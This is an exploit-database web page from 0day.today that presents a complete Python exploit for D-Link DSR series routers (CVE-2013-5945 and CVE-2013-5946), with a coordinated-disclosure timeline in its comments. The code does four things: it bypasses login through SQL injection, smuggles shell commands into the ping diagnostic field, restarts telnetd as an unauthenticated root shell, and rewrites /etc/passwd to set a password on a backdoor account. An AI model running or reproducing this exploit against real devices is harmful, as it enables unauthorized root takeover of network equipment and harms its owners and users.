0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
D-Link DSR Router Series - Remote Root Shell Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
#!/usr/bin/python
#
# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on: D-Link DWC-1000
#
# Download URL: http://tsd.dlink.com.tw
#
# Arch: mips and armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2013-08-18
#
# Purpose: Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites: Network access to the router ports 443 and 23.
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12: Informed Heise Security and asked for their support on this case
# 2013-09-13: Informed the manufacturer D-Link via
# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!)
# http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
# mail@dlink.ru (contact request sent)
# info@dlink.ee (contact request sent)
# info@dlink.de (contact request sent)
# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de
# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17: German BSI responds, contact established.
# 2013-09-24: Requested CVE-IDs.
# 2013-09-25: Heise responds, contact established.
# 2013-09-27: D-Link asks for details on vulns and the exploit code.
# Mitre assigns two CVEs:
# CVE-2013-5945 -- authentication bypass
# CVE-2013-5946 -- privilege escalation
# 2013-09-30: D-Link has received the exploit and documentation via BSI
# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03: Public Disclosure
#
# And now - the fun part :-)
#
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file: /tmp/teamf1.cfg.ascii
# Edit this file to make your changes persistent.
#
##############################
cookie = ""
pid = -2
bduser = ""
def request(m = "", u = "", b = "", h = ""):
global ipaddr
conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
assert m in ["GET", "POST"]
conn.request(method = m, url = u, body = b, headers = h)
ret = conn.getresponse()
header = ret.getheaders()
data = ret.read()
conn.close()
return (header, data)
def login(user, passwd):
global ipaddr
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "index.htm",
'Users.UserName' : user,
'Users.Password' : passwd,
'button.login.Users.deviceStatus' : "Login",
'Login.userAgent' : "Exploit"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def logout():
global ipaddr, cookie
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
'Content-Type': "application/x-www-form-urlencoded"}
body = ""
return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
def execCmd(cmd = None):
global ipaddr, cookie
assert cmd != None
headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': "Exploit",
'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
'Cookie': cookie,
'Content-Type': "application/x-www-form-urlencoded"}
body = {'thispage' : "systemCheck.htm",
'ping.ip' : "localhost;" + cmd,
'button.traceroute.diagDisplay' : "Traceroute"}
return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
def findPid(mystr = None):
# " 957 root 2700 S /usr/sbin/telnetd -l /bin/login"
assert mystr != None
mypid = 0
(h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
s = d.find(mystr)
if s > 0:
# telnetd is running
cand = d[s - 50 : s]
try:
mypid = int(cand.split("\n")[1].split()[0])
except IndexError:
mypid = int(cand.split(">")[1].split()[0])
return mypid
def restartTelnetd(mystr1 = None, mystr2 = None):
assert mystr1 != None and mystr2 != None
global pid
pid = findPid("telnetd -l /bin/")
if pid > 0:
# Stopping the running telnetd
print "[+] Stopping telnetd (" + str(pid) + "): ",
sys.stdout.flush()
(h, d) = execCmd("kill " + str(pid))
pid = findPid(mystr1)
if pid > 0:
print "FAILURE"
sys.exit(-1)
else:
print "OK"
# Starting a new telnetd
print "[+] Starting telnetd: ",
sys.stdout.flush()
(h, d) = execCmd("telnetd -l " + mystr2)
pid = findPid("telnetd -l " + mystr2)
if pid > 0:
print "OK (" + str(pid) + ")"
else:
print "FAILURE"
sys.exit(-1)
def main():
global ipaddr, cookie, pid, bduser, bdpasswd
user = "admin"
passwd = "' or 'a'='a"
print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
print "This change is non-persistent to device reboots."
print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
# Logging into the router
print "[+] Trying to log into the router: ",
sys.stdout.flush()
(h, d) = login(user, passwd)
if d.find("User already logged in") > 0:
print "FAILURE"
print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
sys.exit(-1)
elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
while h:
(c1, c2) = h.pop()
if c1 == 'set-cookie':
cookie = c2
break
print "OK (" + cookie + ")"
elif d.find("Invalid username or password") > 0:
print "FAILURE"
print "[-] Invalid username or password"
sys.exit(-1)
else:
print "FAILURE"
print "[-] Unable to login."
sys.exit(-1)
# Starting a telnetd with custom parameters
print "[+] Preparing the hack..."
restartTelnetd("/bin/login", "/bin/sh")
# Do the h4cK
print "[+] Hacking the router..."
print "[+] Getting the backdoor user name: ",
sys.stdout.flush()
tn = telnetlib.Telnet(ipaddr.split(":")[0])
tn.read_very_eager()
tn.write("cat /etc/profile\n")
time.sleep(5)
data = tn.read_very_eager()
for i in data.split("\n"):
if i.find('"$USER"') > 0:
bduser = i.split('"')[3]
break
if len(bduser) > 0:
print "OK (" + bduser + ")"
else:
print "FAILURE"
sys.exit(-1)
print "[+] Setting the new password for " + bduser + ": ",
sys.stdout.flush()
tn.write("cat /etc/passwd\n")
time.sleep(5)
data = tn.read_very_eager()
data = data.split("\n")
data.reverse()
data.pop()
data.reverse()
data.pop()
data = "\n".join(data)
for i in data.split("\n"):
if i.find(bduser) >= 0:
line = i.split(':')
s1 = string.lowercase + string.uppercase + string.digits
salt = ''.join(random.sample(s1,2))
pw = crypt.crypt(bdpasswd, salt)
line[1] = pw
# doesn't work for some odd reason -- too lazy to find out why
#salt = ''.join(random.sample(s1,8))
#line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$')
data = data.replace(i, ":".join(line))
break
tn.write('echo -en "" > /etc/passwd\n')
time.sleep(5)
for i in data.split("\n"):
tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n')
time.sleep(1)
data = tn.read_very_eager()
tn.close()
if data.find(pw) >= 0:
print "OK (" + pw + ")"
success = True
else:
print "FAILURE"
print "[-] Could not set the new password."
sys.exit(-1)
# Switching back to the originals
print "[+] Mobbing up..."
restartTelnetd("/bin/sh", "/bin/login")
# Logging out
print "[+] Logging out: ",
sys.stdout.flush()
(h, d) = logout()
if d.find('value="Login"') > 0:
print "OK"
else:
print "FAILURE"
print "[-] Unable to determine if user is logged out."
# Print success message
if success:
print "[+] You can now log in via SSH and Telnet by using:"
print " user: " + bduser
print " pass: " + bdpasswd
print " These changes will be reverted upon router reboot."
print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent."
main()
sys.exit(0)
# 0day.today [2024-12-23] #